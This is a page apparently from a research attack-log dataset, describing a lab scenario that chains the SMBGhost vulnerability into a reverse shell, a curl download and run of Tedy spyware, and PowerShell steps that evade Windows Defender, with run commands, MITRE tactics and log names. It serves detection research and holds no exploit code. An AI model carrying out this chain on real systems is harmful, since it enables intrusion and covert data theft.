Home
Attack
Dataset
Contact Us
Attack
2024 01
T1-24–01–S–N–CL
T2-24–01–S–N–CL
T3-24–01–S–N–CL
T4-24–01–S–E–M
T5-24–01–S–E–LM
T6-24–01–S–E–FH
T7-24–01–M–NE–CLM
T8-24–01–M–NE–CFHL
T9-24–01–M–NE–CLM
2024 02
T1-24–02–S–N–CIKM
T2-24–02–S–N–CL
T3-24–02–S–N–CL
T4-24-02-S-E-M
T5-24-02-S-E-DL
T6-24-02-S-E-DEGN
T7-24-02-M-NE-CDEGLN
T8-24-02-M-NE-CDL
T9-24-02-M-NE-CLH
Dataset
Contact Us
T7-24-02-M-NE-CDEGLN
SMBGhost + Tedy Spyware
This attack is a combination of T2-24-01-S-N-CL and T6-24-02-S-E-DEGN, and two logs are collected: pcap and log.
1. Reverse Shell Connection by exploiting SMBGhost Vulnerability
2. Download and execute Spyware on Malware Hosting Server
3. Change System Settings and Use PowerShell Script to Collect Information
The attacker performs a reverse shell connection via the Windows 10 SMB vulnerability using a T2-24-01-S-N-CL attack. Using curl commands the attacker downloads and exectes Tedy Spyware in T6-24-02-S-E-DEGN. To evade Window Defender detection, the spyware uses PowerShell scripts to perform system setup and information gathering, excluding itself.
OS
IP
Software
Log collection
time
Program
runtime
Attacker
Windows 11
192.168.56.1
-
170 sec
200 sec
Victim
Windows 10
192.168.56.112
SMB
Installing
python3 -m pip install -r requirements.txt
Using
python3 run.py
MITRE ATT&CK Framework
Attack Tactic
Reconnaissance
Resource Development
Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential
Discovery
Lateral Movement
Collection
Command and Control
Exfiltration
Impact
Logs
./log/2024_02_T7_{time}.pcap # YYmmdd_HHMMSS
./log/2024_02_T7_{time}.evtx # YYmmdd_HHMMSS
References
[1]
NIST [CVE-2020-0796]
[2]
ZecOps [CVE-2020-0796 Remote Code Execution POC]
[3]
ESTSECURITY [No.181 2024.10 ESRC 보안동향보고서]
[4]
VirusTotal [28AB56D70469C88E4DDE1241C1A2F742202757D4C7AC5259C4308DDD74337045]
[5]
CTX [28AB56D70469C88E4DDE1241C1A2F742202757D4C7AC5259C4308DDD74337045]
※ Click on the attack name to see a description and scenario for the attack
2024 02
T1-24–02–S–N–CIKM
T2-24–02–S–N–CL
T3-24–02–S–N–CL
T4-24-02-S-E-M
T5-24-02-S-E-DL
T6-24-02-S-E-DEGN
T7-24-02-M-NE-CDEGLN
T8-24-02-M-NE-CDL
T9-24-02-M-NE-CLH
Copyright(C) 2024, KAIST Cyber Security Reserch Center. All Rights Reserved.